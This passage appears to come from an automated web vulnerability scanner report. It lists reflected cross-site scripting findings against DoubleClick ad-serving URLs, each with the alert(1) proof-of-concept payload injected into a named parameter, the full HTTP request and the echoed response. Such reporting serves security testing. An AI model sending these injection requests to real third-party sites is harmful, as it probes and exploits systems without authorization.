Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABQLokAAAAAAHfeIgAAAAAAAgDkAAIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAACjtS0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAHA7a06tPwAAAAAAAAAAAABwO2tOrT8AAAAAAAAAAAAAcDtrTq0.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADhX3HBZx9SCugUSM-8gJayF7mxNMV2nhvMny8sAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D797276981%26r%3D0%26s%3D1887835,7a29036c-a12d-11e0-b9a2-5b0ca87794d4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6070
Date: Tue, 28 Jun 2011 02:25:02 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
7%3B4307-300/250%3B39716205/39733992/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=431024565209792489&mt_id=112509&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=&d96da"-alert(1)-"f7095fb1d0a=1http://www.geico.com/landingpage/go140.htm?soa=59798");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "always";

var openWindo
...[SNIP]...

1.32. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.8 [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6595.317091.MERKLEINC.COM/B5374569.8

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efeba"-alert(1)-"38c0b17c448 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6595.317091.MERKLEINC.COM/B5374569.8;sz=300x250;ord=431024565209792489;click=http://pixel.mathtag.com/click/img?mt_aid=431024565209792489&mt_id=112509&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=efeba"-alert(1)-"38c0b17c448 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABQLokAAAAAAHfeIgAAAAAAAgDkAAIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAACjtS0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAHA7a06tPwAAAAAAAAAAAABwO2tOrT8AAAAAAAAAAAAAcDtrTq0.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADhX3HBZx9SCugUSM-8gJayF7mxNMV2nhvMny8sAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D797276981%26r%3D0%26s%3D1887835,7a29036c-a12d-11e0-b9a2-5b0ca87794d4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6058
Date: Tue, 28 Jun 2011 02:24:39 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
87%3B4307-300/250%3B39716205/39733992/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=431024565209792489&mt_id=112509&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=efeba"-alert(1)-"38c0b17c448http://www.geico.com/landingpage/go140.htm?soa=59798");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "always";

var openWindow
...[SNIP]...

1.33. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.8 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6595.317091.MERKLEINC.COM/B5374569.8

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bba38"-alert(1)-"78ca1578dde was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6595.317091.MERKLEINC.COM/B5374569.8;sz=300x250;ord=431024565209792489;click=http://pixel.mathtag.com/click/img?mt_aid=431024565209792489bba38"-alert(1)-"78ca1578dde&mt_id=112509&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABQLokAAAAAAHfeIgAAAAAAAgDkAAIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAACjtS0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAHA7a06tPwAAAAAAAAAAAABwO2tOrT8AAAAAAAAAAAAAcDtrTq0.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADhX3HBZx9SCugUSM-8gJayF7mxNMV2nhvMny8sAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D797276981%26r%3D0%26s%3D1887835,7a29036c-a12d-11e0-b9a2-5b0ca87794d4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6058
Date: Tue, 28 Jun 2011 02:23:04 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
://ad.doubleclick.net/click%3Bh%3Dv8/3b34/7/ab/%2a/s%3B239209737%3B0-0%3B0%3B62127587%3B4307-300/250%3B39716205/39733992/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=431024565209792489bba38"-alert(1)-"78ca1578dde&mt_id=112509&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http://www.geico.com/landingpage/go140.htm?soa=59798");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmod
...[SNIP]...

1.34. http://ad.doubleclick.net/adi/x1.rtb/alldayslim/ron [_a parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/alldayslim/ron

Issue detail

The value of the _a request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be866'-alert(1)-'87c7a423e2e was submitted in the _a parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/alldayslim/ron;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956&_et=1309230488&_a=17328950be866'-alert(1)-'87c7a423e2e&_s=11683&_d=17330108&_c=17286405&_pm=97956&_pn=17331365&redirect=;u=17331365;ord=9530323? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLsQ0CMQwF0A8HKKdbgw5ZImcnjgegpaU-J6ajYxgGYFDE69-CHYCzaa4qhal2U5KuTm7yJNu0RxYxDU_Y3-fbZ8H0Hy6be1QmjqakoxiNXIOa8MhrMb62SDgAekk4At9Xwgl4P_ADwRkDtXMAAAA%3D%26dst%3Dhttp%253A%252F%252Fwww.alldayslim.com&_wp=AAABMNQ33gS2zlTVJGnWaGtLEK3X84GBah6Scw&_nv=1&_CDbg=17328950&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAADZrCAEAAAAAvG8IAQAAAAAFxQcBAAAAAKV0CAEAAAAAp3AIAQAAAACocAgBAAAAACND7EEfhetRuB7tPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA5NzE2NzQ1My02Yzk3LTRjN2ItYjk0Zi05YTdjZTE0NDk3ZWIkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAJhFCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4593
Date: Tue, 28 Jun 2011 03:10:18 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
pe_300x250.jpg';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956&_et=1309230488&_a=17328950be866'-alert(1)-'87c7a423e2e&_s=11683&_d=17330108&_c=17286405&_pm=97956&_pn=17331365&redirect=http%3a%2f%2frts.alldayslim.com/p/fa760703%3Favpzid%3D1018%26avpmid%3D6994%26avppid%3D653%26avpcid%3D3736%26avpaid%3D337%26sid%3D744';

...[SNIP]...

1.35. http://ad.doubleclick.net/adi/x1.rtb/alldayslim/ron [_c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/alldayslim/ron

Issue detail

The value of the _c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3760b'-alert(1)-'d2e50412e43 was submitted in the _c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/alldayslim/ron;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956&_et=1309230488&_a=17328950&_s=11683&_d=17330108&_c=172864053760b'-alert(1)-'d2e50412e43&_pm=97956&_pn=17331365&redirect=;u=17331365;ord=9530323? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLsQ0CMQwF0A8HKKdbgw5ZImcnjgegpaU-J6ajYxgGYFDE69-CHYCzaa4qhal2U5KuTm7yJNu0RxYxDU_Y3-fbZ8H0Hy6be1QmjqakoxiNXIOa8MhrMb62SDgAekk4At9Xwgl4P_ADwRkDtXMAAAA%3D%26dst%3Dhttp%253A%252F%252Fwww.alldayslim.com&_wp=AAABMNQ33gS2zlTVJGnWaGtLEK3X84GBah6Scw&_nv=1&_CDbg=17328950&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAADZrCAEAAAAAvG8IAQAAAAAFxQcBAAAAAKV0CAEAAAAAp3AIAQAAAACocAgBAAAAACND7EEfhetRuB7tPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA5NzE2NzQ1My02Yzk3LTRjN2ItYjk0Zi05YTdjZTE0NDk3ZWIkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAJhFCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4614
Date: Tue, 28 Jun 2011 03:11:29 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
dth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956&_et=1309230488&_a=17328950&_s=11683&_d=17330108&_c=172864053760b'-alert(1)-'d2e50412e43&_pm=97956&_pn=17331365&redirect=http%3a%2f%2frts.alldayslim.com/p/fa760703%3Favpzid%3D1018%26avpmid%3D7003%26avppid%3D653%26avpcid%3D3736%26avpaid%3D337%26sid%3D744';
var target = '_blank';
var dcbgco
...[SNIP]...

1.36. http://ad.doubleclick.net/adi/x1.rtb/alldayslim/ron [_d parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/alldayslim/ron

Issue detail

The value of the _d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3fb80'-alert(1)-'3f118c0b305 was submitted in the _d parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/alldayslim/ron;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956&_et=1309230488&_a=17328950&_s=11683&_d=173301083fb80'-alert(1)-'3f118c0b305&_c=17286405&_pm=97956&_pn=17331365&redirect=;u=17331365;ord=9530323? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLsQ0CMQwF0A8HKKdbgw5ZImcnjgegpaU-J6ajYxgGYFDE69-CHYCzaa4qhal2U5KuTm7yJNu0RxYxDU_Y3-fbZ8H0Hy6be1QmjqakoxiNXIOa8MhrMb62SDgAekk4At9Xwgl4P_ADwRkDtXMAAAA%3D%26dst%3Dhttp%253A%252F%252Fwww.alldayslim.com&_wp=AAABMNQ33gS2zlTVJGnWaGtLEK3X84GBah6Scw&_nv=1&_CDbg=17328950&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAADZrCAEAAAAAvG8IAQAAAAAFxQcBAAAAAKV0CAEAAAAAp3AIAQAAAACocAgBAAAAACND7EEfhetRuB7tPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA5NzE2NzQ1My02Yzk3LTRjN2ItYjk0Zi05YTdjZTE0NDk3ZWIkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAJhFCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4623
Date: Tue, 28 Jun 2011 03:11:06 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956&_et=1309230488&_a=17328950&_s=11683&_d=173301083fb80'-alert(1)-'3f118c0b305&_c=17286405&_pm=97956&_pn=17331365&redirect=http%3a%2f%2frts.alldayslim.com/p/fa760703%3Favpzid%3D1018%26avpmid%3D6990%26avppid%3D653%26avpcid%3D3736%26avpaid%3D337%26sid%3D744';
var target = '_blank'
...[SNIP]...

1.37. http://ad.doubleclick.net/adi/x1.rtb/alldayslim/ron [_eo parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/alldayslim/ron

Issue detail

The value of the _eo request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d52cb'-alert(1)-'412f1479ff2 was submitted in the _eo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/alldayslim/ron;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956d52cb'-alert(1)-'412f1479ff2&_et=1309230488&_a=17328950&_s=11683&_d=17330108&_c=17286405&_pm=97956&_pn=17331365&redirect=;u=17331365;ord=9530323? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLsQ0CMQwF0A8HKKdbgw5ZImcnjgegpaU-J6ajYxgGYFDE69-CHYCzaa4qhal2U5KuTm7yJNu0RxYxDU_Y3-fbZ8H0Hy6be1QmjqakoxiNXIOa8MhrMb62SDgAekk4At9Xwgl4P_ADwRkDtXMAAAA%3D%26dst%3Dhttp%253A%252F%252Fwww.alldayslim.com&_wp=AAABMNQ33gS2zlTVJGnWaGtLEK3X84GBah6Scw&_nv=1&_CDbg=17328950&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAADZrCAEAAAAAvG8IAQAAAAAFxQcBAAAAAKV0CAEAAAAAp3AIAQAAAACocAgBAAAAACND7EEfhetRuB7tPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA5NzE2NzQ1My02Yzk3LTRjN2ItYjk0Zi05YTdjZTE0NDk3ZWIkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAJhFCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4602
Date: Tue, 28 Jun 2011 03:09:31 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
n.net/3126678/SLIM_Wipe_Maria_300x250.jpg';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956d52cb'-alert(1)-'412f1479ff2&_et=1309230488&_a=17328950&_s=11683&_d=17330108&_c=17286405&_pm=97956&_pn=17331365&redirect=http%3a%2f%2frts.alldayslim.com/p/fa760703%3Favpzid%3D1018%26avpmid%3D6972%26avppid%3D653%26avpcid%3D3736%26
...[SNIP]...

1.38. http://ad.doubleclick.net/adi/x1.rtb/alldayslim/ron [_et parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/alldayslim/ron

Issue detail

The value of the _et request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db96c'-alert(1)-'befe711ab0a was submitted in the _et parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/alldayslim/ron;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956&_et=1309230488db96c'-alert(1)-'befe711ab0a&_a=17328950&_s=11683&_d=17330108&_c=17286405&_pm=97956&_pn=17331365&redirect=;u=17331365;ord=9530323? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLsQ0CMQwF0A8HKKdbgw5ZImcnjgegpaU-J6ajYxgGYFDE69-CHYCzaa4qhal2U5KuTm7yJNu0RxYxDU_Y3-fbZ8H0Hy6be1QmjqakoxiNXIOa8MhrMb62SDgAekk4At9Xwgl4P_ADwRkDtXMAAAA%3D%26dst%3Dhttp%253A%252F%252Fwww.alldayslim.com&_wp=AAABMNQ33gS2zlTVJGnWaGtLEK3X84GBah6Scw&_nv=1&_CDbg=17328950&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAADZrCAEAAAAAvG8IAQAAAAAFxQcBAAAAAKV0CAEAAAAAp3AIAQAAAACocAgBAAAAACND7EEfhetRuB7tPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA5NzE2NzQ1My02Yzk3LTRjN2ItYjk0Zi05YTdjZTE0NDk3ZWIkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAJhFCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4614
